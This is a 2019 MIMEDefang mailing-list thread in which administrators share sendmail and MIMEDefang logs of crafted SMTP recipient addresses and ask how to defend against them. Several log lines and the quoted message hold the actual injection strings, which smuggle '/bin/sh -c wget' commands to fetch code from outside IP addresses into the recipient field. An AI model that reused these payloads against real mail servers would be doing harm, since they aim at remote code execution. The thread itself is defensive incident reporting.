[Mimedefang] Carefully Crafted Recipient executes script?
Paul Murphy
pjm at ousekjarr.org
Tue Jun 25 17:31:23 EDT 2019
Interesting - on review of my logs, I had one of these about a week ago:
Jun 19 15:11:46 baldur mimedefang.pl[29364]: x5JEBkA2001099: x5JEBkA2001099: SPF_check on 46.101.19.140 (<support at service.com>) helo service.com
Jun 19 15:11:46 baldur sendmail[1099]: x5JEBkA2001099: ruleset=check_rcpt, arg1=<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>, relay=[46.101.19.140], reject=550 5.7.1 <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>... Relaying denied. IP name lookup failed [46.101.19.140]
Jun 19 15:11:46 baldur sendmail[1099]: x5JEBkA2001099: [46.101.19.140]: Possible SMTP RCPT flood, throttling.
Jun 19 15:11:47 baldur sendmail[1099]: x5JEBkA2001099: ruleset=check_rcpt, arg1=<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>, relay=[46.101.19.140], reject=550 5.7.1 <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@Ready>... Relaying denied. IP name lookup failed [46.101.19.140]
Jun 19 15:11:48 baldur mimedefang.pl[29364]: x5JEBkA2001099: DEBUG: Checking sender/recipient for ip=46.101.19.140,sender=<support at service.com>,recipient=<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f82.70.29.206\x22}}@localhost>,fullrecip=root at localhost
Jun 19 15:11:48 baldur mimedefang.pl[29364]: x5JEBkA2001099: MDLOG,x5JEBkA2001099,bad_recip,0,46.101.19.140,<support at service.com>,<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f82.70.29.206\x22}}@localhost>,?
Jun 19 15:11:48 baldur mimedefang.pl[29364]: x5JEBkA2001099: filter_recipient rejected recipient <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f82.70.29.206\x22}}@localhost>
Jun 19 15:11:48 baldur sendmail[1099]: x5JEBkA2001099: Milter: to=<root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x2064.50.180.45\\x2ftmp\\x2f82.70.29.206\\x22}}@localhost>, reject=554 5.7.1 Invalid user address - not known here
Jun 19 15:11:48 baldur sendmail[1099]: x5JEBkA2001099: from=<support at service.com>, size=0, class=0, nrcpts=0, proto=SMTP, daemon=MTA, relay=[46.101.19.140]
I keep copies of rejected messages for 2 days for exactly this sort of reason, but unfortunately this is long gone.
However, the relaying restrictions in Sendmail rejected the message even while MIMEDefang was thinking about it.
Best Wishes,
Paul.
-----Original Message-----
From: MIMEDefang [mailto:mimedefang-bounces at lists.roaringpenguin.com] On Behalf Of Stefan Schoeman
Sent: 25 June 2019 21:26
To: mimedefang at lists.roaringpenguin.com
Subject: [Mimedefang] Carefully Crafted Recipient executes script?
Hoping someone can assist me with this...
I just came across an email processed by MIMEDefang that seems to have had a specially crafted recipient. It seems as if the crafted recipient managed to coerce either my mimedefang-filter, or MIMEDefang itself to actually execute script. The recipient was recorded as :
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>
which looks as if it tried to execute /bin/sh -c "wget 65.181.120.163/stfinracu", with at least some partial success, because the .INPUTMSG file resulted in:
Received: 1
Received: 2
Received: 3
...
...
Received: 31
A Spamassasin scan of this file, then yielded:
1.2 MISSING_HEADERS Missing To: header
1.8 MISSING_SUBJECT Missing Subject: header
2.3 EMPTY_MESSAGE Message appears to have no textual parts and no Subject: text
1.0 MISSING_FROM Missing From: header
0.0 MSGID_FROM_MTA_HEADER Message-Id was added by a relay
1.4 MISSING_DATE Missing Date: header
which seems to indicate that this lot happened before SpamAssassin ran in filter_end
My logfile indicated the following:
Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: from=<root at 208.com>, size=395, class=0, nrcpts=1, msgid=<201906251921.x5PJLcKV004747 at --->,
proto=SMTP, daemon=MTA, relay=minecraft.good-gaming.com [34.228.4.69] Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG: GeoIP lookup of 34.228.4.69 is 'US'
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: DEBUG REPLYTO=, SENDER=<root at 208.com>, FROM= Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: SpamAssassin Result : 7.715 Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: Mail Subject :
x5PJLcKV004747 : : 2 : 7.715 : 0.85136 : <root at 208.com> :
<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2065.181.120.163\x2fstfinracu\x22}}@server>
: 34.228.4.69 : 395
Jun 25 21:21:41 smtp mimedefang.pl[3505]: x5PJLcKV004747: filter: discard=1 Jun 25 21:21:41 smtp mimedefang[17340]: x5PJLcKV004747: Discarding because filter instructed us to Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: Milter: data, discard Jun 25 21:21:41 smtp sm-mta[4747]: x5PJLcKV004747: discarded
I would very much like to hear the community's opinion on this and how I can protect against this?
Thanks in advance!
Stefan
_______________________________________________
NOTE: If there is a disclaimer or other legal boilerplate in the above message, it is NULL AND VOID. You may ignore it.
Visit http://www.mimedefang.org and http://www.roaringpenguin.com MIMEDefang mailing list MIMEDefang at lists.roaringpenguin.com
http://lists.roaringpenguin.com/mailman/listinfo/mimedefang
More information about the MIMEDefang
mailing list